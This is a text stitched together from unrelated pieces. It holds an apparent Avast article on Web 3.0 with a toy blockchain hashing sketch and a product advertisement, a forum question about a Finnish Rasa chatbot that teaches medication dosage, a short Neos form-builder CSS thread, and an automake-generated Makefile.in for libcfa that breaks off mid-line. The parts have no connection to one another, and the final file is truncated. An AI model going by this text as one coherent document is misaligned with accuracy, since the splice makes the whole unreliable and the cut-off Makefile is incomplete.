Web 3.0 leans on artificial intelligence (AI) to develop computers that can understand the meaning or context of user requests and answer complex requests more quickly. The artificial intelligence of the Web 3.0 era goes beyond the interactivity of Web 2.0 and creates experiences for people that feel curated, seamless, and intuitive — a central aim behind the development of the metaverse.
Part of AI is machine learning and applying techniques like predictive analytics to outline relationships and patterns that help predict future outcomes and events. Whereas machine learning is passive, AI requires an agent to learn and interact with the environment.
From a user perspective, advancements in machine learning could lead to better customer support. Increasingly intelligent chatbots will be able to support multiple consumers at once, with far more accuracy than current standards. This advanced technology will also deliver ideal search results, identify fake news, and select high-quality content.
[Image: Screenshot of the Mailchimp chatbot pop-up box that allows you to type a question and get automated responses]
Semantic Web
Semantic means “relating to meaning in language or logic.” The Semantic Web improves the abilities of web technologies to generate, share, and connect content through search and analysis by understanding the meaning of language beyond simple keywords.
Websites of the 2.0 era have been created primarily for humans to read, with increased consideration for search engine understanding. Web 3.0 uses ideas of the Semantic Web as a springboard to take readability, creativity, and interactivity to another level.
Under Web 3.0, search engine, platform, and connectivity capabilities will skyrocket. Rather than discerning meaning from a series of ones and zeros, keywords, headers, links, and other metadata, computers will be able to understand context and identify your true needs and goals.
Is Web 3.0 the same as the Semantic Web?
No, web 3.0 is not the same as the Semantic Web. The two concepts are connected but not interchangeable. Web 3.0 is based on the notion of the Semantic Web, but it is not the Semantic Web itself.
The definition of the Semantic Web came about in 2006 from Tim Berners-Lee, computer scientist and inventor of the World Wide Web. His definition of the Semantic Web speaks of a future version of the web as an “integrated huge space of data” and “unbelievable data resource.”
Web 3.0 captures these ideas from the Semantic Web and evolves into something much bigger, integrating more diverse features such as AI, machine learning, decentralization, and peer-to-peer networks.
3D Graphics
Web 3.0 addresses the user experience on several levels, including the front-end experience, or how we take in what we see on our screens. 3D design is often used in websites and services in Web 3.0. The most common examples of it can be found in eCommerce, real estate, computer games, and virtual museum tours.
[Image: A 3D-rendered kitchen lets viewers imagine what it will look like when built.]
Examples of Web 3.0 applications
Web 3.0 applications incorporate AI and machine learning technology. Most of the Web 3.0 apps that are already live today involve cryptocurrency and finance. In the future, all types of apps will be created, making them smarter and more user-centric.
Siri is a good example of an app employing Web 3.0 technology. Apple’s AI assistant lets users control their surroundings and devices with voice commands. Another popular Web 3.0 app currently in use is the web browser Brave, which connects participants with Dapps, their crypto wallets, and other Web 3.0 technology.
Risks or downsides of Web 3.0
The lack of centralized gatekeepers in Web 3.0 could pose a significant risk to users. While Web 3.0’s decentralized ownership is seen to empower individuals, the lack of oversight can increase consumer risk, as was seen in the collapse of the major cryptocurrency exchange FTX.
Decentralization could make regulating Web 3.0 virtually impossible. And with the rapid increase of the amount of information stored on the web and additional interactions and transactions, unauthorized access to personal data could have devastating consequences.
There will also be new types of cyber attacks to contend with. Ice phishing and other FinTech hacks already exist, and novel cybersecurity threats will continue to emerge. More generally, widespread data manipulation could lead to disinformation. If all users are anonymous in the new world, this includes those with bad intentions. Holding people accountable for attacks and data manipulation will become even more complicated.
Aside from security threats, Web 3.0 consumes a lot of energy resources due to its reliance on blockchain technology. Mining cryptocurrency, DeFi transactions, and the decentralization of data require a huge amount of power to operate, which will put even more stress on global energy systems.
Examples of Web 3.0 in real life
Web 3.0 websites and Web 3.0 apps are already here. You've likely heard of them in the media, such as the costly examples of cryptojacking. Or, you may have already interacted with Web 3.0 applications, such as an Internet of Things appliance. Perhaps you’ve even explored the possibilities and meaning of the Metaverse. You may have been exposed to examples of Web 3.0 without even knowing it.
[Image: A woman's hand adjusting smart home appliances from the control panel.]
The unprecedented levels of interactivity will drive the need for broader awareness of the security risks of IoT. In mere decades, the world has moved from static Web 1.0 apps and websites to dynamic models and emerging Web 3.0 technology.
Web 3.0 exists in a technical manner, like blockchain, and a user experience manner, like a Web 3.0 app that can decipher your intent. Here are some examples of Web 3.0 that already exist:
• Blockchain technology: a decentralized record of transactions that are stored on a huge number of computers across the internet. All transactions can be publicly viewed, rely on sophisticated encryption, and are permanent. (A toy sketch of the hash-linking idea follows this list.)
• Cryptocurrency: a decentralized currency that isn't controlled by any government or central bank, using blockchain technology to record transactions. There are thousands of cryptocurrencies that currently exist, with Bitcoin being the most well-known.
• NFT: a non-fungible token linked to a unique digital or physical asset that can't be replaced with something else. NFTs are not cryptocurrencies, which consist of fungible or tradable tokens. This creative example of Web3 technology is bound to evolve in the future.
• Distributed computing or edge computing: this technology aims to deliver online data and services as close to where it's being requested or generated as possible. Edge computing leverages the processing power of many devices linked together, working as a kind of decentralized supercomputer. Decentralized computing is closely linked to the Internet of Things.
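To make the "linked record" idea concrete, here is a toy Python sketch of hash-linking. It only illustrates the tamper-evidence property; consensus, mining, and everything else a real blockchain needs are out of scope, and the transaction strings are made up:

import hashlib, json

def block_hash(data, prev_hash):
    body = json.dumps({"data": data, "prev": prev_hash}, sort_keys=True)
    return hashlib.sha256(body.encode()).hexdigest()

def make_block(data, prev_hash):
    # Each block records the hash of the previous block, so altering
    # any earlier block invalidates every block after it.
    return {"data": data, "prev": prev_hash,
            "hash": block_hash(data, prev_hash)}

chain = [make_block("genesis", "0" * 64)]
for tx in ["alice->bob: 5", "bob->carol: 2"]:
    chain.append(make_block(tx, chain[-1]["hash"]))

def chain_valid(chain):
    # Every stored hash must match its contents, and every block must
    # point at the hash of the block before it.
    return all(b["hash"] == block_hash(b["data"], b["prev"]) for b in chain) \
       and all(chain[i]["prev"] == chain[i - 1]["hash"] for i in range(1, len(chain)))

print(chain_valid(chain))               # True
chain[1]["data"] = "alice->bob: 500"    # tamper with a past transaction
print(chain_valid(chain))               # False - the stored hash no longer matches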
Get ironclad security for today and for the future
Regardless of whether you’re connected to Web 2.0 apps or already immersed in AI-powered Web 3.0 experiences, you need reliable cybersecurity to protect your personal data. Avast One is built on top of an award-winning anti-malware engine and includes built-in features like a high-speed VPN, optimization tools, and data breach monitoring. Secure your digital life today with Avast One.
FAQs
What’s the difference between Web 3.0 and Web3?
The terms Web 3.0 and Web3 are often used interchangeably. But Web 3.0 focuses on the Semantic Web, while Web3 refers to the idea of decentralization. Both concepts aim to give control back to users and offer an alternative vision of the web from the current one.
How does Web 3.0 benefit our lives?
As the third iteration of the web, Web 3.0 offers a range of benefits: It aims to make user experiences more seamless and tailored, on-screen visuals more appealing and advanced (3D graphics), and Web 3.0 technologies more secure.
What language will Web3 use?
Web3 will use numerous programming languages. Solidity is the most widely used language for blockchain programming, which is fundamental to Web3. Other important languages include C++, Java, Python, Rust, HTML, Vyper, Go (Golang), and C#.
Rasa actions, how to get back to actual bot?
My bot can now check the answer and reply whether it is correct or not, but after that the bot doesn't continue to the next story. Why not?
My environment
rasa 2.2.0
rasa-sdk 2.2.0
Docker version 20.10.8, build 3967b7d
Ubuntu 18.04.5 LTS
Domain
version: "2.0"
intents:
- aloita
- vastaus01
- vastaus02
- siirry_diaan_09
- siirry_diaan_10
forms:
kysymys01_form:
vastaus01:
- type: from_text
slots:
vastaus01:
type: text
influence_conversation: false
responses:
utter_ask_vastaus01:
- text: "- Potilaalle on määrätty tyroksiinia 50 mikrogrammaa. Thyroxin tablettien vahvuus on 0,1 mg. Kuinka monta tablettia annat potilaalle? \n- Montako tablettia otat purkista ja annat potilaalle? \n- Kirjoita vastauksesi alle"
utter_kysymys01_oikein:
- text: Hienoa, oikea vastaus! potilas saa oikean annoksen lääkettä.
utter_lopetus:
- text: potilas saa oikean annoksen lääkettä.
image: "https://i.imgur.com/nGF1K8f.jpg"
utter_kysymys01_vaarin:
- text: "- Vastauksesi on väärin, lasketaan yhdessä uudestaan."
utter_kysymys_02:
- text: "- Aloitetaan siitä, että muunnetaan ensin yksiköt samaan yksikköön. \n- Koska potilaalle on määrätty lääkeannos mikrogrammoissa, sinun täytyy muuttaa lääkepurkin vahvuutena oleva milligrammat samaan yksikköön eli mikrogrammoiksi (potilaalle oli määrätty 50 mcg) \n- Purkissa olevan yhden tabletin vahvuus on? mikrogrammaa, kirjoita yksikönmuunnos vastauksesi alle."
utter_kysymys02_oikein:
- text: Hienoa, nyt on oikeat yksiköt laskua varten.
buttons:
- title: " en tiedä"
payload: "/siirry_diaan_09"
- title: " tarkistetaan mikä olikaan potilaalle määrätty annos "
payload: "/siirry_diaan_10"
- title: " annetaan potilaalle 0,05 tablettia"
payload: "/siirry_diaan_09"
utter_dia_09:
- text: Käydäänpä läpi miten yksikönmuunnokset tehdään.
utter_dia_10:
- text: "Käydäänpä läpi miten yksikönmuunnokset tehdään."
utter_kysymys02_vaarin:
- text: Väärin
utter_kysymys_03:
- text: Mikä olikaan potilaalle määrätty annos mikrogrammoina ? Tarvitset tämän tiedon pystyäksesi jatkamaan laskua. kirjoita vastauksesi alle.
utter_kysymys_04:
- text: Eli jos purkissa oleva tabletti on 100 mikrogrammaa ja potilaalle on määrätty 50 mikrogrammaa. Eli kuinka monta tablettia annat?
utter_dia_12:
- text: Kokeillaanpa laskea verranto -laskutavalla. X = kuinka monta tablettia pitää antaa?
utter_kysymys_05:
- text: Lasketaan verranto -laskutavalla /n- Kerrotaan ristiin 100 x X ja 50 x 1 /n- 100x = 50 /n- X = 50/100 /n- X = 0,5 eli ___ tbl /n- kirjoita vastauksesi alle
utter_kysymys05_vaarin:
- text: Katso matikkapirkon video verranto -laskutapa
utter_kysymys04_vaarin:
- text: lisää oikea teksti
utter_dia_13:
- text: tähän kanssa lisää
actions:
- action_tarkista_kysymys_01
- action_tarkista_kysymys_02
- action_tarkista_kysymys_04
- action_tarkista_kysymys_05
session_config:
session_expiration_time: 60
carry_over_slots_to_new_session: true
Actions
from typing import Any, Text, Dict, List
from rasa_sdk.events import SlotSet
from rasa_sdk import Action, Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.types import DomainDict
class kysymyksienTarkistus1(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_01"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "puolikas":
dispatcher.utter_message(text = "vastaus oikein")
dispatcher.utter_message(template = "utter_kysymys01_oikein")
dispatcher.utter_message(template = "utter_lopetus")
return []
else:
dispatcher.utter_message(text = "vastaus väärin")
dispatcher.utter_message(template = "utter_kysymys01_vaarin")
return []
class kysymyksienTarkistus2(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_02"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys02_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys02_vaarin")
return []
class kysymyksienTarkistus4(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_04"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys01_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys04_vaarin")
return []
class kysymyksienTarkistus5(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_05"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys01_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys05_vaarin")
return []
NLU
version: "2.0"
nlu:
- intent: aloita
examples: |
- aloitus
- aloita
- intent: vastaus01
examples: |
- puolikas
- puoli
- intent: vastaus02
examples: |
- 100
- sata
- intent: siirry_diaan_09
examples: |
- siirry_diaan_09
- intent: siirry_diaan_10
examples: |
- siirry_diaan_10
Stories
version: "2.0"
stories:
- story: aloitus ja kysymys 01
steps:
- intent: aloita
- action: kysymys01_form
# formi kysyy kysymyksen
- active_loop: kysymys01_form
- active_loop: null
# - slot_was_set:
# - requested_slot: null
- action: action_tarkista_kysymys_01
- action: action_restart
- story: lopetus 01
steps:
- action: utter_kysymys01_oikein
- action: utter_lopetus
- story: kysymys 2
steps:
- action: utter_kysymys01_vaarin
- action: utter_kysymys_02
- intent: vastaus02
- action: action_tarkista_kysymys_02
- action: utter_kysymys02_oikein
- story: Valinta a ja c 01
steps:
- intent: siirry_diaan_09
- action: utter_dia_09
- action: utter_kysymys_02
- intent: vastaus02
- action: action_tarkista_kysymys_02
- action: utter_kysymys02_oikein
- story: Dia 10 ja kysymys 04
steps:
- intent: siirry_diaan_10
- action: utter_dia_10
- action: utter_kysymys_04
- intent: vastaus01
- action: action_tarkista_kysymys_04
- story: Kysymys 03 ja 04
steps:
- action: utter_kysymys02_vaarin
- action: utter_kysymys_03
- action: utter_kysymys_04
- intent: vastaus01
- action: action_tarkista_kysymys_04
- story: Kysymys 04
steps:
- action: utter_kysymys_04
- intent: vastaus01
- action: utter_kysymys04_vaarin
- action: utter_dia_12
- action: utter_dia_13
- story: kysymys 05
steps:
- action: utter_kysymys04_vaarin
- action: utter_dia_12
- action: utter_dia_13
- action: utter_kysymys_05
- intent: vastaus01
- action: action_tarkista_kysymys_05
- story: Kysymys 5 uudestaan
steps:
- action: utter_kysymys05_vaarin
- action: utter_kysymys_05
- intent: vastaus01
- action: action_tarkista_kysymys_05
Rules
version: "2.0"
rules:
- rule: Activate form
steps:
- intent: aloita
- action: kysymys01_form
- active_loop: kysymys01_form
- rule: Submit form
condition:
- active_loop: kysymys01_form
steps:
- action: kysymys01_form
- active_loop: null
- slot_was_set:
- requested_slot: null
- action: action_tarkista_kysymys_01
- action: action_restart
[SOLVED] Add custom CSS class to input in neos/form-builder
Hey guys!
Is there a way to add custom CSS classes, like the classic Bootstrap "form-control", to the inputs in neos/form-builder, @bwaidelich?
Thank you for your answer.
Pat
Hi Patric,
It should all be documented here: https://flow-form-framework.readthedocs.io/en/stable/adjusting-form-output.html
Or is there anything in particular that you're missing?
Thank you Bastian! I found everything necessary in Settings.yaml of Neos.Form.
1 Like
source: libcfa/Makefile.in @ c59712e
Last change on this file since c59712e was c59712e, checked in by Thierry Delisle <tdelisle@…>, 3 years ago
Parent make now seems to properly call libcfa
# Makefile.in generated by automake 1.15 from Makefile.am.
# @configure_input@

# Copyright (C) 1994-2014 Free Software Foundation, Inc.

# This Makefile.in is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.

@SET_MAKE@

######################## -*- Mode: Makefile-Automake -*- ######################
###############################################################################
VPATH = @srcdir@
am__is_gnu_make = { \
  if test -z '$(MAKELEVEL)'; then \
    false; \
  elif test -n '$(MAKE_HOST)'; then \
    true; \
  elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \
    true; \
  else \
    false; \
  fi; \
}
am__make_running_with_option = \
  case $${target_option-} in \
      ?) ;; \
      *) echo "am__make_running_with_option: internal error: invalid" \
              "target option '$${target_option-}' specified" >&2; \
         exit 1;; \
  esac; \
  has_opt=no; \
  sane_makeflags=$$MAKEFLAGS; \
  if $(am__is_gnu_make); then \
    sane_makeflags=$$MFLAGS; \
  else \
    case $$MAKEFLAGS in \
      *\\[\ \ ]*) \
        bs=\\; \
        sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \
          | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \
    esac; \
  fi; \
  skip_next=no; \
  strip_trailopt () \
  { \
    flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \
  }; \
  for flg in $$sane_makeflags; do \
    test $$skip_next = yes && { skip_next=no; continue; }; \
    case $$flg in \
      *=*|--*) continue;; \
        -*I) strip_trailopt 'I'; skip_next=yes;; \
      -*I?*) strip_trailopt 'I';; \
        -*O) strip_trailopt 'O'; skip_next=yes;; \
      -*O?*) strip_trailopt 'O';; \
        -*l) strip_trailopt 'l'; skip_next=yes;; \
      -*l?*) strip_trailopt 'l';; \
      -[dEDm]) skip_next=yes;; \
      -[JT]) skip_next=yes;; \
    esac; \
    case $$flg in \
      *$$target_option*) has_opt=yes; break;; \
    esac; \
  done; \
  test $$has_opt = yes
am__make_dryrun = (target_option=n; $(am__make_running_with_option))
am__make_keepgoing = (target_option=k; $(am__make_running_with_option))
pkgdatadir = $(datadir)/@PACKAGE@
pkgincludedir = $(includedir)/@PACKAGE@
pkglibdir = $(libdir)/@PACKAGE@
pkglibexecdir = $(libexecdir)/@PACKAGE@
am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd
install_sh_DATA = $(install_sh) -c -m 644
install_sh_PROGRAM = $(install_sh) -c
install_sh_SCRIPT = $(install_sh) -c
INSTALL_HEADER = $(INSTALL_DATA)
transform = $(program_transform_name)
NORMAL_INSTALL = :
PRE_INSTALL = :
POST_INSTALL = :
NORMAL_UNINSTALL = :
PRE_UNINSTALL = :
POST_UNINSTALL = :
subdir = .
ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
am__aclocal_m4_deps = $(top_srcdir)/configure.ac
am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \
	$(ACLOCAL_M4)
DIST_COMMON = $(srcdir)/Makefile.am $(top_srcdir)/configure \
	$(am__configure_deps) $(am__DIST_COMMON)
am__CONFIG_DISTCLEAN_FILES = config.status config.cache config.log \
 configure.lineno config.status.lineno
mkinstalldirs = $(install_sh) -d
CONFIG_CLEAN_FILES =
CONFIG_CLEAN_VPATH_FILES =
AM_V_P = $(am__v_P_@AM_V@)
am__v_P_ = $(am__v_P_@AM_DEFAULT_V@)
am__v_P_0 = false
am__v_P_1 = :
AM_V_GEN = $(am__v_GEN_@AM_V@)
am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@)
am__v_GEN_0 = @echo "  GEN     " $@;
am__v_GEN_1 =
AM_V_at = $(am__v_at_@AM_V@)
am__v_at_ = $(am__v_at_@AM_DEFAULT_V@)
am__v_at_0 = @
am__v_at_1 =
SOURCES =
DIST_SOURCES =
RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \
	ctags-recursive dvi-recursive html-recursive info-recursive \
	install-data-recursive install-dvi-recursive \
	install-exec-recursive install-html-recursive \
	install-info-recursive install-pdf-recursive \
	install-ps-recursive install-recursive installcheck-recursive \
	installdirs-recursive pdf-recursive ps-recursive \
	tags-recursive uninstall-recursive
am__can_run_installinfo = \
  case $$AM_UPDATE_INFO_DIR in \
    n|no|NO) false;; \
    *) (install-info --version) >/dev/null 2>&1;; \
  esac
RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \
	distclean-recursive maintainer-clean-recursive
am__recursive_targets = \
  $(RECURSIVE_TARGETS) \
  $(RECURSIVE_CLEAN_TARGETS) \
  $(am__extra_recursive_targets)
AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \
	cscope distdir dist dist-all distcheck
am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP)
# Read a list of newline-separated strings from the standard input,
# and print each of them once, without duplicates.  Input order is
# *not* preserved.
am__uniquify_input = $(AWK) '\
  BEGIN { nonempty = 0; } \
  { items[$$0] = 1; nonempty = 1; } \
  END { if (nonempty) { for (i in items) print i; }; } \
'
# Make sure the list of sources is unique.  This is necessary because,
# e.g., the same source file might be shared among _SOURCES variables
# for different programs/libraries.
am__define_uniq_tagged_files = \
  list='$(am__tagged_files)'; \
  unique=`for i in $$list; do \
    if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
  done | $(am__uniquify_input)`
ETAGS = etags
CTAGS = ctags
CSCOPE = cscope
DIST_SUBDIRS = $(SUBDIRS)
am__DIST_COMMON = $(srcdir)/Makefile.in \
	$(top_srcdir)/./automake/compile \
	$(top_srcdir)/./automake/install-sh \
	$(top_srcdir)/./automake/missing ./automake/compile \
	./automake/depcomp ./automake/install-sh ./automake/missing
DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)
distdir = $(PACKAGE)-$(VERSION)
top_distdir = $(distdir)
am__remove_distdir = \
  if test -d "$(distdir)"; then \
    find "$(distdir)" -type d ! -perm -200 -exec chmod u+w {} ';' \
      && rm -rf "$(distdir)" \
      || { sleep 5 && rm -rf "$(distdir)"; }; \
  else :; fi
am__post_remove_distdir = $(am__remove_distdir)
am__relativize = \
  dir0=`pwd`; \
  sed_first='s,^\([^/]*\)/.*$$,\1,'; \
  sed_rest='s,^[^/]*/*,,'; \
  sed_last='s,^.*/\([^/]*\)$$,\1,'; \
  sed_butlast='s,/*[^/]*$$,,'; \
  while test -n "$$dir1"; do \
    first=`echo "$$dir1" | sed -e "$$sed_first"`; \
    if test "$$first" != "."; then \
      if test "$$first" = ".."; then \
        dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \
        dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \
      else \
        first2=`echo "$$dir2" | sed -e "$$sed_first"`; \
        if test "$$first2" = "$$first"; then \
          dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \
        else \
          dir2="../$$dir2"; \
        fi; \
        dir0="$$dir0"/"$$first"; \
      fi; \
    fi; \
    dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \
  done; \
  reldir="$$dir2"
DIST_ARCHIVES = $(distdir).tar.gz
GZIP_ENV = --best
DIST_TARGETS = dist-gzip
distuninstallcheck_listfiles = find . -type f -print
am__distuninstallcheck_listfiles = $(distuninstallcheck_listfiles) \
  | sed 's|^\./|$(prefix)/|' | grep -v '$(infodir)/dir$$'
distcleancheck_listfiles = find . -type f -print
ACLOCAL = @ACLOCAL@
AMTAR = @AMTAR@
AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@
AUTOCONF = @AUTOCONF@
AUTOHEADER = @AUTOHEADER@
AUTOMAKE = @AUTOMAKE@
AWK = @AWK@
CC = @CC@
CCAS = @CCAS@
CCASDEPMODE = @CCASDEPMODE@
CCASFLAGS = @CCASFLAGS@
CCDEPMODE = @CCDEPMODE@
CFLAGS = @CFLAGS@
CPPFLAGS = @CPPFLAGS@
CXX = @CXX@
CXXDEPMODE = @CXXDEPMODE@
CXXFLAGS = @CXXFLAGS@
CYGPATH_W = @CYGPATH_W@
DEFS = @DEFS@
DEPDIR = @DEPDIR@
ECHO_C = @ECHO_C@
ECHO_N = @ECHO_N@
ECHO_T = @ECHO_T@
EXEEXT = @EXEEXT@
INSTALL = @INSTALL@
INSTALL_DATA = @INSTALL_DATA@
INSTALL_PROGRAM = @INSTALL_PROGRAM@
INSTALL_SCRIPT = @INSTALL_SCRIPT@
INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@
LDFLAGS = @LDFLAGS@
LIBOBJS = @LIBOBJS@
LIBS = @LIBS@
LTLIBOBJS = @LTLIBOBJS@
MAKEINFO = @MAKEINFO@
MKDIR_P = @MKDIR_P@
OBJEXT = @OBJEXT@
PACKAGE = @PACKAGE@
PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@
PACKAGE_NAME = @PACKAGE_NAME@
PACKAGE_STRING = @PACKAGE_STRING@
PACKAGE_TARNAME = @PACKAGE_TARNAME@
PACKAGE_URL = @PACKAGE_URL@
PACKAGE_VERSION = @PACKAGE_VERSION@
PATH_SEPARATOR = @PATH_SEPARATOR@
RANLIB = @RANLIB@
SET_MAKE = @SET_MAKE@
SHELL = @SHELL@
STRIP = @STRIP@
VERSION = @VERSION@
abs_builddir = @abs_builddir@
abs_srcdir = @abs_srcdir@
abs_top_builddir = @abs_top_builddir@
abs_top_srcdir = @abs_top_srcdir@
ac_ct_CC = @ac_ct_CC@
ac_ct_CXX = @ac_ct_CXX@
am__include = @am__include@
am__leading_dot = @am__leading_dot@
am__quote = @am__quote@
am__tar = @am__tar@
am__untar = @am__untar@
bindir = @bindir@
build_alias = @build_alias@
builddir = @builddir@
datadir = @datadir@
datarootdir = @datarootdir@
docdir = @docdir@
dvidir = @dvidir@
exec_prefix = @exec_prefix@
host_alias = @host_alias@
htmldir = @htmldir@
includedir = @includedir@
infodir = @infodir@
install_sh = @install_sh@
libdir = @libdir@
libexecdir = @libexecdir@
localedir = @localedir@
localstatedir = @localstatedir@
mandir = @mandir@
mkdir_p = @mkdir_p@
oldincludedir = @oldincludedir@
pdfdir = @pdfdir@
prefix = @prefix@
program_transform_name = @program_transform_name@
psdir = @psdir@
runstatedir = @runstatedir@
sbindir = @sbindir@
sharedstatedir = @sharedstatedir@
srcdir = @srcdir@
sysconfdir = @sysconfdir@
target_alias = @target_alias@
top_build_prefix = @top_build_prefix@
top_builddir = @top_builddir@
top_srcdir = @top_srcdir@
AUTOMAKE_OPTIONS = foreign # do not require all the GNU file names
SUBDIRS = prelude src # order important
all: all-recursive

.SUFFIXES:
am--refresh: Makefile
	@:
$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)
	@for dep in $?; do \
	  case '$(am__configure_deps)' in \
	    *$$dep*) \
	      echo ' cd $(srcdir) && $(AUTOMAKE) --foreign'; \
	      $(am__cd) $(srcdir) && $(AUTOMAKE) --foreign \
	        && exit 0; \
	      exit 1;; \
	  esac; \
	done; \
	echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign Makefile'; \
	$(am__cd) $(top_srcdir) && \
	  $(AUTOMAKE) --foreign Makefile
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status
	@case '$?' in \
	  *config.status*) \
	    echo ' $(SHELL) ./config.status'; \
	    $(SHELL) ./config.status;; \
	  *) \
	    echo ' cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__depfiles_maybe)'; \
	    cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__depfiles_maybe);; \
	esac;

$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
	$(SHELL) ./config.status --recheck

$(top_srcdir)/configure: $(am__configure_deps)
	$(am__cd) $(srcdir) && $(AUTOCONF)
$(ACLOCAL_M4): $(am__aclocal_m4_deps)
	$(am__cd) $(srcdir) && $(ACLOCAL) $(ACLOCAL_AMFLAGS)
$(am__aclocal_m4_deps):

# This directory's subdirectories are mostly independent; you can cd
# into them and run 'make' without going through this Makefile.
# To change the values of 'make' variables: instead of editing Makefiles,
# (1) if the variable is set in 'config.status', edit 'config.status'
# (which will cause the Makefiles to be regenerated when you run 'make');
# (2) otherwise, pass the desired values on the 'make' command line.
$(am__recursive_targets):
	@fail=; \
	if $(am__make_keepgoing); then \
	  failcom='fail=yes'; \
	else \
	  failcom='exit 1'; \
	fi; \
	dot_seen=no; \
	target=`echo $@ | sed s/-recursive//`; \
	case "$@" in \
	  distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \
	  *) list='$(SUBDIRS)' ;; \
	esac; \
	for subdir in $$list; do \
	  echo "Making $$target in $$subdir"; \
	  if test "$$subdir" = "."; then \
	    dot_seen=yes; \
	    local_target="$$target-am"; \
	  else \
	    local_target="$$target"; \
	  fi; \
	  ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
	  || eval $$failcom; \
	done; \
	if test "$$dot_seen" = "no"; then \
	  $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \
	fi; test -z "$$fail"

ID: $(am__tagged_files)
	$(am__define_uniq_tagged_files); mkid -fID $$unique
tags: tags-recursive
TAGS: tags

tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files)
	set x; \
	here=`pwd`; \
	if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \
	  include_option=--etags-include; \
	  empty_fix=.; \
	else \
	  include_option=--include; \
	  empty_fix=; \
	fi; \
	list='$(SUBDIRS)'; for subdir in $$list; do \
	  if test "$$subdir" = .; then :; else \
	    test ! -f $$subdir/TAGS || \
	      set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \
	  fi; \
	done; \
	$(am__define_uniq_tagged_files); \
	shift; \
	if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \
	  test -n "$$unique" || unique=$$empty_fix; \
	  if test $$# -gt 0; then \
	    $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
	      "$$@" $$unique; \
	  else \
	    $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
	      $$unique; \
	  fi; \
	fi
ctags: ctags-recursive

CTAGS: ctags
ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files)
	$(am__define_uniq_tagged_files); \
	test -z "$(CTAGS_ARGS)$$unique" \
	  || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \
	     $$unique

GTAGS:
	here=`$(am__cd) $(top_builddir) && pwd` \
	  && $(am__cd) $(top_srcdir) \
	  && gtags -i $(GTAGS_ARGS) "$$here"
cscope: cscope.files
	test ! -s cscope.files \
	  || $(CSCOPE) -b -q $(AM_CSCOPEFLAGS) $(CSCOPEFLAGS) -i cscope.files $(CSCOPE_ARGS)
clean-cscope:
	-rm -f cscope.files
cscope.files: clean-cscope cscopelist
cscopelist: cscopelist-recursive

cscopelist-am: $(am__tagged_files)
	list='$(am__tagged_files)'; \
	case "$(srcdir)" in \
	  [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \
